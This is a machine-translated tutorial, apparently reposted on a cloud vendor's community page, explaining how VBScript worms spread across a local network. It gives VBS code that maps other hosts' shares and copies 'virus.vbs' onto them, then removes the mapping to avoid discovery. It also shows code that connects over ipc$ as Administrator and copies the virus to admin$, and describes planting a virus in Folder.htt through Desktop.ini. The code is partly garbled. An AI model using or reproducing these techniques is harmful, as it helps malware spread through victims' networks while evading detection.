Using the MapNetworkDrive method in WSH the way the script worm spreads _vbs

Source: Internet
Author: User
I've seen some discussions on the internet about how to spread the scripting worms, and here are some ideas.
1. Using the MapNetworkDrive method in WSH. The method is to map the network drive locally.
MapNetworkDrive Method:
Object. MapNetworkDrive (Strlocalname, Strremotename, [Bupdateprofile], [struser], [strpassword])
Parameters
Object
WSHNetwork object.
Strlocalname
A string value representing the local name of the mapped drive.
Strremotename
A string value representing the shared UNC name (\\XXX\YYY).
Bupdateprofile
Optional. A Boolean value that represents whether the mapping information is stored in the current user profile. If the value of the supplied Bupdateprofile is true, the mapping is stored in the user's profile (the default is False).
Struser
Optional. A string value that represents the user name. If you use the credentials of a user other than the current user to map a network drive, you must supply the parameter.
Strpassword
Optional. A string value that represents the user's password. If you use the credentials of a user other than the current user to map a network drive, you must supply the parameter.
Description
An error occurs when you attempt to map a unshared network drive.
The main principle is: After getting the local LAN address (typically 192.168.*.*), map the shared directory of other hosts to a local drive (such as Z:), and then copy the virus to the mapped local drive Z: so that the virus is replicated to the directory of other hosts. Finally, use the RemoveNetworkDrive method to remove the mappings, lest they be discovered.
RemoveNetworkDrive Method:
Object. RemoveNetworkDrive (StrName, [BForce], [Bupdateprofile])
Parameters
Object
WSHNetwork object.
StrName
A string value representing the mapped drive name to be deleted. The StrName parameter can be either a local name or a remote name, depending on how the drive is mapped.
BForce
Optional. Boolean value that indicates whether to force deletion of mapped drives. If the value of the supplied BForce is true, the method deletes those connections, regardless of whether the resource is in use.
Bupdateprofile
Optional. Indicates whether the mapped string value is removed from the user's configuration file. If Bupdateprofile is provided and the value is true, the mapping is removed from the user profile. The default value for Bupdateprofile is false.
Description
If there is a mapping between the local name (drive name) and the remote name (UNC name), StrName must be set to the local name. If a local name (drive letter) mapping does not exist in the network path, StrName must be set to the remote name.
Here I give the example code for a VBS:
Set myfso= CreateObject ("Scripting.FileSystemObject")
Set WSHNetwork = WScript.CreateObject ("Wscript.Network")
Wshnetwork.mapnetworkdrive "I:", "\" & UNC
Fso.copyfile "C:\virus.vbs", "I:\virus.vbs.txt"
Wshnetwork.removenetworkdrive "I:"
2. Use ipc$ to connect. This way estimated to play hack friend more familiar with it! The principle is to use Wscript.Shell to execute. can refer to a variety of ipc$ attack fool tutorial, here only provides a section of code:
Set objshell=wscript.createobject ("Wscript.Shell")
Dim ST,SC
st= "net use \" & "192.168.0.1 \ipc$" & Pass & "/" & "Administrator"
Objshell.run St
sc= "Copy c:\virus.vbs \\192.168.0.1\admin$"
Objshell.run SC
3. It is like the "New Happy Time" virus to use the Folder.htt passive to spread.
Desktop.ini: Active Desktop configuration file
Desktop.ini defines the style in which the folder it resides on the desktop or in Explorer and some properties of the folder.
Key: Webviewtemplate.nt5=file://folder.htt
is to modify the Desktop.ini to point to the Folder.htt in the same directory, and when you open the folder in Web view, the Folder.htt is executed according to the settings inside the Desktop.ini. So we can write the virus to the folder.htt, so that it keeps replicating.
See the other virus analysis for new happy times specifically.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.